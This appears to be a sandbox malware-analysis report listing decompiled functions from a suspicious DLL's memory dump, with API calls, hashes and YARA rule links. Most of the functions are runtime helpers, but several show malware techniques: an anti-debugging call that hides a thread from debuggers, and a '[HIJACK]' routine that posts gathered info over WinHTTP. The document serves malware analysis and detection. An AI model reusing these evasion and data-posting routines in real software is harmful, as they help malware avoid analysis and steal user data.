Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressCurrentLibraryLoadProcProcess
String ID: NtQueryInformationProcess$Ntdll.dll
API String ID: 353374858-801751246
Opcode ID: 97d65c81b8affce13ccd6c9ce68ef998821de5ec64206124f7a57a839e50d98e
Instruction ID: aa9a5b676a7025e0056a7a55a28efeedef31c6b5470972081c5102af1e44dd82
Opcode Fuzzy Hash: 97d65c81b8affce13ccd6c9ce68ef998821de5ec64206124f7a57a839e50d98e
Instruction Fuzzy Hash: 35F01C75900208FBEB009BE0CD4DBDCBBB8EB04301F514094EA11A6180DA741A48CB55

Uniqueness

Uniqueness Score: -1.00%

Function 10019DA0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20
libraryloaderthreadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10019DA0() {
				_Unknown_base(*)()* _v8;
				struct HINSTANCE__* _v12;

				_v12 = LoadLibraryA("Ntdll.dll");
				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
				return _v8(GetCurrentThread(), 0x11, 0, 0);
			}

0x10019db1
0x10019dc3
0x10019dd9

APIs

LoadLibraryA.KERNEL32(Ntdll.dll,?,100207E1), ref: 10019DAB
GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019DBD
GetCurrentThread.KERNEL32 ref: 10019DCC

Strings

ZwSetInformationThread, xrefs: 10019DB4
Ntdll.dll, xrefs: 10019DA6

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressCurrentLibraryLoadProcThread
String ID: Ntdll.dll$ZwSetInformationThread
API String ID: 903204110-1680533912
Opcode ID: 81fb8b46b22517918d6ec40a5a4b5af2fd6c90d3156655230c1d6776d8c37ca9
Instruction ID: ec36d98e740d09ce498d664616d1e94f1a85ab36ce5175e8c059281a5b49cb64
Opcode Fuzzy Hash: 81fb8b46b22517918d6ec40a5a4b5af2fd6c90d3156655230c1d6776d8c37ca9
Instruction Fuzzy Hash: 7FE0E674944208FBEF009BE09D8DB9CBB78EB04702FA14051FF05A6280DA715A454AA5

Uniqueness

Uniqueness Score: -1.00%

Function 1001F500, Relevance: 7.6, APIs: 5, Instructions: 65
registrytimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1001F500(void* _a4, char* _a8) {
				char* _v8;
				struct _FILETIME _v12;
				void* _v16;
				struct _SYSTEMTIME _v32;
				char* _v40;
				char* _v44;
				struct _FILETIME _v52;
				char* _t43;

				_v44 = 0;
				_v40 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16) == 0) {
					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						_v32.wYear = 0x7b2;
						_v32.wMonth = 1;
						_v32.wDay = 1;
						_v32.wHour = 0;
						_v32.wMinute = 0;
						_v32.wSecond = 0;
						_v32.wMilliseconds = 0;
						SystemTimeToFileTime( &_v32,  &_v52);
						_t43 = _v8;
						asm("sbb edx, [ebp-0x2c]");
						_v44 = E1000F2F0(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
						_v40 = _t43;
					}
					RegCloseKey(_v16);
				}
				return _v44;
			}

0x1001f506
0x1001f50d
0x1001f514
0x1001f536
0x1001f560
0x1001f562
0x1001f568
0x1001f56e
0x1001f574
0x1001f57a
0x1001f580
0x1001f586
0x1001f594
0x1001f5a0
0x1001f5a3
0x1001f5b4
0x1001f5b7
0x1001f5b7
0x1001f5be
0x1001f5be
0x1001f5cd

APIs

RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00000101,00000000), ref: 1001F52E
RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F558
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F594
__aulldiv.LIBCMT ref: 1001F5AF
RegCloseKey.ADVAPI32(00000000), ref: 1001F5BE

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
String ID:
API String ID: 3147484438-0
Opcode ID: b7fd3d01d5ea90349a3a8d64e1f3cb3a0cb48ce308f43978e438b8e68c732dd2
Instruction ID: f30bdbee4ac12bde428f6f044f578bd3b240634cd6c104924fe674acfb2d543b
Opcode Fuzzy Hash: b7fd3d01d5ea90349a3a8d64e1f3cb3a0cb48ce308f43978e438b8e68c732dd2
Instruction Fuzzy Hash: 87210D75D10208ABEB00CFD4C898FEEB7B9FF48704F109148EA14BB290D7759A49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1001F430, Relevance: 7.6, APIs: 5, Instructions: 61
timefileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1001F430(char* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				struct _FILETIME _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				struct _FILETIME _v60;
				void* _v64;
				struct _SECURITY_ATTRIBUTES* _t44;

				_v28 = 0;
				_v24 = 0;
				if(PathFileExistsA(_a4) != 0) {
					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
						_v20.wYear = 0x7b2;
						_v20.wMonth = 1;
						_v20.wDay = 1;
						_v20.wHour = 0;
						_v20.wMinute = 0;
						_v20.wSecond = 0;
						_v20.wMilliseconds = 0;
						SystemTimeToFileTime( &_v20,  &_v60);
						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
						asm("sbb eax, [ebp-0x34]");
						_v28 = E1000F2F0(_t44, _v36.dwHighDateTime, 0x2710, 0);
						_v24 = _t44;
					}
				}
				return _v28;
			}

0x1001f436
0x1001f43d
0x1001f450
0x1001f472
0x1001f479
0x1001f495
0x1001f49b
0x1001f4a1
0x1001f4a7
0x1001f4ad
0x1001f4b3
0x1001f4b9
0x1001f4c7
0x1001f4d0
0x1001f4d6
0x1001f4e7
0x1001f4ea
0x1001f4ea
0x1001f479
0x1001f4f6

APIs

PathFileExistsA.SHLWAPI(?), ref: 1001F448
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F46C
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F48B
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F4C7
__aulldiv.LIBCMT ref: 1001F4E2

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: File$Time$CreateExistsPathSystem__aulldiv
String ID:
API String ID: 3038978132-0
Opcode ID: c1a897aad6c05bd8ab7d9b163dd1f078ef973958e7b535aac97c866858d62821
Instruction ID: 282c7306dc6b684cc064bb2559bb565ca804bda22c30e035a61ca1407b16c130
Opcode Fuzzy Hash: c1a897aad6c05bd8ab7d9b163dd1f078ef973958e7b535aac97c866858d62821
Instruction Fuzzy Hash: 4621EA75910208ABEB10DFD4D895FEEB7B8FF04704F108208E505BB290DB75A685CB95

Uniqueness

Uniqueness Score: -1.00%

Function 10019390, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019390(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t21;
				void* _t25;
				void* _t30;
				void* _t38;
				void* _t42;
				void* _t44;
				void* _t46;

				_t38 = __edi;
				_t30 = __ebx;
				_t17 = E1000CAD0(_a4);
				_t18 = E1000CAD0(_a8);
				_t44 = _t42 + 8;
				if(_t17 >= _t18) {
					_v8 = _a4;
					_v12 = 0;
					while(1) {
						_t19 = E1000CAD0(_a8);
						_t21 = E1000CAD0(_a4);
						_t46 = _t44 + 8;
						if(_t19 + _v12 > _t21) {
							break;
						}
						_t25 = E1000E8FF(_t30, _a8, _t38, _v8, _a8, E1000CAD0(_a8));
						_t44 = _t46 + 0x10;
						if(_t25 != 0) {
							_v12 = _v12 + 1;
							_v8 = _v8 + 1;
							continue;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}

APIs

_strlen.LIBCMT ref: 1001939B
_strlen.LIBCMT ref: 100193A9
_strlen.LIBCMT ref: 100193E0
_strlen.LIBCMT ref: 100193F1
_strlen.LIBCMT ref: 10019401

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: e838c8b0435b565fb9a53166a5dd30e01c929ba7b477388d88b0234cdaad13b2
Instruction ID: bf7a77dd80a6ed25a2450b96e81a1ff586a3e69a3a9db53e8abd92bbbbbe0b29
Opcode Fuzzy Hash: e838c8b0435b565fb9a53166a5dd30e01c929ba7b477388d88b0234cdaad13b2
Instruction Fuzzy Hash: DA113BB9E0020CA7EB10DFA8E841D9D77A4EB04294F148165FD0BDB305E531FE519792

Uniqueness

Uniqueness Score: -1.00%

Function 10019730, Relevance: 7.6, APIs: 5, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019730(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t24;
				void* _t27;
				void* _t28;
				void* _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t36 = __edi;
				_t28 = __ebx;
				_v8 = 0;
				if(_a4 != 0 && _a8 != 0) {
					_t20 = E1000CAD0(_a4);
					_t21 = E1000CAD0(_a8);
					_t42 = _t40 + 8;
					if(_t20 >= _t21) {
						_v12 = 0;
						while(1) {
							_t23 = E1000CAD0(_a4);
							_t24 = E1000CAD0(_a8);
							_t44 = _t42 + 8;
							if(_v12 >= _t23 - _t24) {
								goto L9;
							}
							_t27 = E1000E8FF(_t28, _a8, _t36, _a4 + _v12, _a8, E1000CAD0(_a8));
							_t42 = _t44 + 0x10;
							if(_t27 != 0) {
								_v12 = _v12 + 1;
								continue;
							} else {
								_v8 = 1;
							}
							goto L9;
						}
					}
				}
				L9:
				return _v8;
			}

APIs

_strlen.LIBCMT ref: 10019756
_strlen.LIBCMT ref: 10019764
_strlen.LIBCMT ref: 10019786
_strlen.LIBCMT ref: 10019794
_strlen.LIBCMT ref: 100197A7

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 0dbfc59573e71ac4ac271f730958a2ed3158fc847fef0a7d16788525cec2ac39
Instruction ID: 99576d049c222a76ac79d86fac94021c753d4d4845e8680ecbc727badbbf4d85
Opcode Fuzzy Hash: 0dbfc59573e71ac4ac271f730958a2ed3158fc847fef0a7d16788525cec2ac39
Instruction Fuzzy Hash: 8511A7B9D1420CABEB10CFA4D845B9E77E4EF042A8F008165FC0B9B641E635EA94C782

Uniqueness

Uniqueness Score: -1.00%

Function 1000EAC5, Relevance: 7.5, APIs: 5, Instructions: 39
threadCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E1000EAC5(void* __ebx, void* __edi) {

				E100115F6();
				if(E10014911(1, 0x214) != __edi) {
					_push(__esi);
					_push( *0x10334590);
					__eax = E1001158A( *0x10335480);
					__eflags = __eax;
					if(__eflags == 0) {
						_push(__esi);
						__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
						goto L1;
					} else {
						_push(__edi);
						_push(__esi);
						__eax = E1001165D(__ebx, __edi, __esi, __eflags);
						__eax = GetCurrentThreadId();
						__esi[1] = __esi[1] | 0xffffffff;
						 *__esi = __eax;
						0 = 1;
						__eflags = 1;
					}
				}
				return 0;
			}

APIs

___set_flsgetvalue.LIBCMT ref: 1000EAC5

Part of subcall function 100115F6: TlsGetValue.KERNEL32(10011720), ref: 100115FC
Part of subcall function 100115F6: __decode_pointer.LIBCMT ref: 1001160C
Part of subcall function 100115F6: TlsSetValue.KERNEL32(00000000), ref: 10011619

__calloc_crt.LIBCMT ref: 1000EAD1

Part of subcall function 10014911: __calloc_impl.LIBCMT ref: 1001491F
Part of subcall function 10014911: Sleep.KERNEL32(00000000,10011746,00000001,00000214), ref: 10014936

__decode_pointer.LIBCMT ref: 1000EAEF

Part of subcall function 1001158A: TlsGetValue.KERNEL32(?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001,?,?,10331640), ref: 10011597
Part of subcall function 1001158A: TlsGetValue.KERNEL32(00000005,?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001), ref: 100115AE

__initptd.LIBCMT ref: 1000EAFD

Part of subcall function 1001165D: GetModuleHandleA.KERNEL32(KERNEL32.DLL,103316C0,0000000C,1001176F,00000000,00000000), ref: 1001166E
Part of subcall function 1001165D: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10011697
Part of subcall function 1001165D: GetProcAddress.KERNEL32(?,DecodePointer), ref: 100116A7
Part of subcall function 1001165D: InterlockedIncrement.KERNEL32(10334658), ref: 100116C9
Part of subcall function 1001165D: ___addlocaleref.LIBCMT ref: 100116F0

GetCurrentThreadId.KERNEL32 ref: 1000EB04

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Value$AddressProc__decode_pointer$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref___set_flsgetvalue__calloc_crt__calloc_impl__initptd
String ID:
API String ID: 1662683381-0
Opcode ID: 95b815981802653688cc0cebbafbd1d3d34d1eb17374ba65d4117c0aeae8b2e9
Instruction ID: 106076030708d108cc7be60c426ae776d5d8c147d49c5448cdaefb0738cd9b5f
Opcode Fuzzy Hash: 95b815981802653688cc0cebbafbd1d3d34d1eb17374ba65d4117c0aeae8b2e9
Instruction Fuzzy Hash: B5F02E37204252A9F328E7351C02C4F3784DF827F1721092DF157E80E1EE21D9815560

Uniqueness

Uniqueness Score: -1.00%

Function 10022DFB, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10022DFB(void* __ebx, void* __edi, void* __esi) {
				void* _t72;
				void* _t73;
				void* _t76;
				void* _t110;
				void* _t112;

				L0:
				while(1) {
					L0:
					_t109 = __esi;
					_t108 = __edi;
					_t77 = __ebx;
					 *((intOrPtr*)(_t110 - 0x2c)) =  *((intOrPtr*)(_t110 - 0x2c)) + 1;
					L1:
					_t118 =  *((intOrPtr*)(_t110 - 0x2c)) - 6;
					if( *((intOrPtr*)(_t110 - 0x2c)) <= 6) {
						L2:
						E100011C0(_t110 - 0x80, 0x10025cba);
						 *((intOrPtr*)(_t110 - 0xe8)) = E10022710(__ebx, __edi, __esi, _t118, _t110 - 0xbc,  *((intOrPtr*)(_t110 - 0x2c)));
						 *((intOrPtr*)(_t110 - 0xec)) =  *((intOrPtr*)(_t110 - 0xe8));
						 *((char*)(_t110 - 4)) = 5;
						E10001A70(_t110 - 0x80,  *((intOrPtr*)(_t110 - 0xec)));
						 *((char*)(_t110 - 4)) = 4;
						E100011A0(_t110 - 0xbc);
						 *((intOrPtr*)(_t110 - 0xf0)) = E10001160(_t110 - 0xd8, _t118,  *((intOrPtr*)(_t110 + 0xc)));
						 *((intOrPtr*)(_t110 - 0xf4)) =  *((intOrPtr*)(_t110 - 0xf0));
						 *((char*)(_t110 - 4)) = 6;
						E10001A90(_t110 - 0x80,  *((intOrPtr*)(_t110 - 0xf4)));
						 *((char*)(_t110 - 4)) = 4;
						E100011A0(_t110 - 0xd8);
						_push(E100011E0(_t110 - 0x80));
						_push(0x61);
						_push("post_info");
						E1001F230(__edi, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp"));
						E100011C0(_t110 - 0x28, 0x10025cbb);
						E100011C0(_t110 - 0x48, 0x10025cce);
						_t72 = E10001200(_t110 - 0x64);
						_t73 = E100011E0(_t110 - 0x64);
						E10021C30(__ebx, __edi, __esi, _t118, 0, 0, 0, E100011E0(_t110 - 0x80), 2, 1, 0, _t73, _t72, 0, 0, 0, 0, 0, 0, _t110 - 0x28, _t110 - 0x48);
						_t112 = _t112 + 0x60;
						_t76 = E10001200(_t110 - 0x28);
						_t119 = _t76;
						if(_t76 == 0) {
							L4:
							continue;
						}
					}
					L5:
					_push( *((intOrPtr*)(_t110 - 0x84)));
					E1000CA40(_t77, _t108, _t109, _t119);
					E10001110( *((intOrPtr*)(_t110 + 8)), _t119, _t110 - 0x48);
					 *(_t110 - 0xdc) =  *(_t110 - 0xdc) | 0x00000001;
					 *((char*)(_t110 - 4)) = 3;
					E100011A0(_t110 - 0x48);
					 *((char*)(_t110 - 4)) = 1;
					E100011A0(_t110 - 0x28);
					 *((char*)(_t110 - 4)) = 0;
					E100011A0(_t110 - 0x64);
					 *((intOrPtr*)(_t110 - 4)) = 0xffffffff;
					E100011A0(_t110 - 0x80);
					 *[fs:0x0] =  *((intOrPtr*)(_t110 - 0xc));
					return  *((intOrPtr*)(_t110 + 8));
					L6:
				}
			}

APIs

Part of subcall function 10022710: _memset.LIBCMT ref: 1002276B
Part of subcall function 10022710: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 1002278C

PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000061,00000000,?,?,?,info=,10025CA2), ref: 10022EBA

Part of subcall function 1001F230: _memset.LIBCMT ref: 1001F25B
Part of subcall function 1001F230: OutputDebugStringA.KERNEL32(?,?,?,?,?,10022D49,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F293

Part of subcall function 10021C30: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021D64
Part of subcall function 10021C30: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021DAC

Strings

.\post_info.cpp, xrefs: 10022EB5
post_info, xrefs: 10022EB0
[HIJACK][%s][%s][%d]: url = %s, xrefs: 10022EC1

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Http_memset$DebugFileFindLocalNameOpenOptionOutputPathStringTime
String ID: .\post_info.cpp$[HIJACK][%s][%s][%d]: url = %s$post_info
API String ID: 4078257140-115957201
Opcode ID: 536ff6acf1412ecd6a85183df319c154ebfa3d59a51a68a5e205cc1e31637370
Instruction ID: 4cd3f4f778056951b5cfd2b5c12ca28e1b0ee278467a54424c11d59ecdb1d103
Opcode Fuzzy Hash: 536ff6acf1412ecd6a85183df319c154ebfa3d59a51a68a5e205cc1e31637370
Instruction Fuzzy Hash: C1413D75D11248ABEB18DB94CC92FEDBB74EF18384F5080A8F60A77195EB302A45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1001A7A0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1001A7A0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				char _v279;
				char _v280;
				intOrPtr _v284;
				char _v312;
				signed int _v316;
				void* __ebp;
				void* _t27;
				intOrPtr _t52;
				void* _t55;

				_t51 = __esi;
				_t50 = __edi;
				_t37 = __ebx;
				_push(0xffffffff);
				_push(E10023171);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_v316 = 0;
				E10001160( &_v312, __eflags, 0x10025c8f);
				_v8 = 0;
				_v280 = 0;
				E1000CF80(__edi,  &_v279, 0, 0x103);
				E1001DC60(__ebx, _t50, __esi,  &_v280);
				_t46 =  &_v280;
				_t27 = E1000CAD0( &_v280);
				_t55 = _t52 - 0x12c + 0x10;
				_t59 = _t27;
				if(_t27 == 0) {
					E1000D903( &_v280,  &_v280, 0x104, "unknown err");
					_t55 = _t55 + 0xc;
				}
				_v284 = E1001A4E0(_t37, _t46, _t50, _t51, _t59,  &_v280);
				E100011C0( &_v312, _v284);
				_push(_v284);
				E1000CA40(_t37, _t50, _t51, _t59);
				E10001110(_a4, _t59,  &_v312);
				_v316 = _v316 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v312);
				 *[fs:0x0] = _v16;
				return _a4;
			}

APIs

_memset.LIBCMT ref: 1001A7F4

Part of subcall function 1001DC60: _memset.LIBCMT ref: 1001DC88
Part of subcall function 1001DC60: _memset.LIBCMT ref: 1001DCA5
Part of subcall function 1001DC60: _memset.LIBCMT ref: 1001DCBB
Part of subcall function 1001DC60: GetVersionExW.KERNEL32(00000114), ref: 1001DCD4
Part of subcall function 1001DC60: _strcpy_s.LIBCMT ref: 1001DE09

_strlen.LIBCMT ref: 1001A80F
_strcpy_s.LIBCMT ref: 1001A82C

Strings

unknown err, xrefs: 1001A81B

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_strcpy_s$Version_strlen
String ID: unknown err
API String ID: 3541540748-813478822
Opcode ID: 33fe9bc53815d7083cfc22242b5e7d25d46ec0366052ba861b10af646b939fe3
Instruction ID: 3aebd5af5d9b05859a12e4e17c573b0f64c0ee580e65f946a6305cb29b00d5b6
Opcode Fuzzy Hash: 33fe9bc53815d7083cfc22242b5e7d25d46ec0366052ba861b10af646b939fe3
Instruction Fuzzy Hash: A6217CB5C0021CABDB28DB64DD82BD9B774EB04750F4041E8B609A7285EB74BB84CF92

Uniqueness

Uniqueness Score: -1.00%

Function 100181BA, Relevance: 6.1, APIs: 4, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100181BA(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E1000D555( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E10013A7B( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E1000F780(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 100181EA
__isleadbyte_l.LIBCMT ref: 1001821E
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,10016BDE,?,?,00000002), ref: 1001824F
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,10016BDE,?,?,00000002), ref: 100182BD

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 055a8c03e4689a610b2b33372239977322d8b4542b05d195dfabf953701ab400
Instruction ID: d5078d4910217e7b4ecb4b559098acf50bee0a5cb4f006de64edc12b54e59432
Opcode Fuzzy Hash: 055a8c03e4689a610b2b33372239977322d8b4542b05d195dfabf953701ab400
Instruction Fuzzy Hash: 6131B031A00256EFDB12CFA4CC84AAE7BF9FF01251F168569E8609F091E730DB81DB51

Uniqueness

Uniqueness Score: -1.00%

Function 1001A3D0, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

